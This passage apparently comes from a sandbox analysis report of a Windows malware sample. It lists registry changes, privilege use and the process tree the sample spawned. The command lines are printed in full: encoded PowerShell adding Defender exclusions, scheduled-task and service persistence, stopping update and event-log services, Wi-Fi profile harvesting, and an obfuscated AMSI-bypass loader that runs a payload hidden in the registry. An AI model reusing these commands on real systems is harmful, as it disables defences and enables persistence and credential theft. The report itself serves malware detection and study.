| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1153236273-2212388449-1493869963-1000\{C39E5D0C-9F5A-4087-ACFB-9AFB8511C36F} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" | C:\Windows\system32\sihost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" | C:\Windows\system32\sihost.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1153236273-2212388449-1493869963-1000\{1B8FE61C-B4DB-4F04-8069-E6E2E8EE2AD7} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\systemprocess.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\systemprocess.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\CompPkg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\CompPkg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\host.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\systemprocess.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Users\Admin\AppData\Local\Temp\primate protocol.exe
"C:\Users\Admin\AppData\Local\Temp\primate protocol.exe"
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAawBtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGUAZQBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASABFAEEARABTAEUAVAAgAE4ATwBUACAARABFAFQARQBDAFQARQBEACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBuAGYAZwAjAD4A"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZwBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAbgBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAawBmACMAPgA="
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\systemprocess.exe
"C:\Windows\systemprocess.exe"
C:\Windows\host.exe
"C:\Windows\host.exe"
C:\Windows\CompPkg.exe
"C:\Windows\CompPkg.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "HOST" /sc ONLOGON /tr "C:\Windows\systemprocess.exe" /rl HIGHEST /f
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "CompPkg" /tr "C:\Users\Admin\AppData\Roaming\CompPkg.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SYSTEM32\netsh.exe
"netsh" wlan show profiles
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "$([System.Environment]::GetEnvironmentVariable('SystemDrive'))\"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "PROCESS HOST"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "PROCESS HOST" binpath= "C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe" start= "auto"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OdjsqXVEoMxo{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yfmVlGOStjgHBO,[Parameter(Position=1)][Type]$UJRGIblVoq)$hIprbDofzkL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+[Char](101)+'g'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+'r'+''+[Char](121)+''+'M'+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+'s'+''+'s'+','+'P'+''+[Char](117)+'b'+'l'+'i'+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+'A'+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$hIprbDofzkL.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+'e'+[Char](99)+''+'i'+'a'+[Char](108)+'N'+'a'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eB'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yfmVlGOStjgHBO).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+'M'+'a'+'n'+'a'+'g'+[Char](101)+''+[Char](100)+'');$hIprbDofzkL.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'','P'+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+'g'+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+'lo'+'t'+''+','+''+[Char](86)+''+[Char](105)+'r'+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'',$UJRGIblVoq,$yfmVlGOStjgHBO).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+'i'+''+[Char](109)+''+'e'+','+[Char](77)+'a'+'n'+''+'a'+'g'+'e'+''+'d'+'');Write-Output $hIprbDofzkL.CreateType();}$vyVsTzFyMRkLJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'yst'+[Char](101)+''+[Char](109)+'.dl'+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+'a'+''+'f'+''+[Char](101)+''+'N'+''+'a'+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+'t'+'h'+[Char](111)+''+[Char](100)+''+'s'+'');$bYPnAmzEfuscSx=$vyVsTzFyMRkLJ.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+'c'+','+''+'S'+'t'+'a'+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZDRpFjDocdPWEvpSmDG=OdjsqXVEoMxo @([String])([IntPtr]);$nfWTHpcRSoEqqeFdfiOtpn=OdjsqXVEoMxo @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$wEXXhkFtbyb=$vyVsTzFyMRkLJ.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+'d'+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+'3'+'2.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$oleLiZxwkOLAwO=$bYPnAmzEfuscSx.Invoke($Null,@([Object]$wEXXhkFtbyb,[Object](''+[Char](76)+'o'+[Char](97)+''+'d'+''+[Char](76)+'ib'+'r'+''+'a'+''+[Char](114)+''+'y'+''+'A'+'')));$PiJGUFQYEknHQZPKx=$bYPnAmzEfuscSx.Invoke($Null,@([Object]$wEXXhkFtbyb,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+'a'+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$HEIoPYX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oleLiZxwkOLAwO,$ZDRpFjDocdPWEvpSmDG).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$uXiOiPrfOfLHHnfYI=$bYPnAmzEfuscSx.Invoke($Null,@([Object]$HEIoPYX,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+'S'+[Char](99)+''+'a'+'nB'+[Char](117)+''+[Char](102)+''+[Char](102)+'er')));$zhrGrazrmt=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PiJGUFQYEknHQZPKx,$nfWTHpcRSoEqqeFdfiOtpn).Invoke($uXiOiPrfOfLHHnfYI,[uint32]8,4,[ref]$zhrGrazrmt);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$uXiOiPrfOfLHHnfYI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PiJGUFQYEknHQZPKx,$nfWTHpcRSoEqqeFdfiOtpn).Invoke($uXiOiPrfOfLHHnfYI,[uint32]8,0x20,[ref]$zhrGrazrmt);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+'F'+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+''+[Char](108)+'e'+[Char](114)+''+[Char](115)+''+'t'+''+[Char](97)+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "PROCESS HOST"
C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe
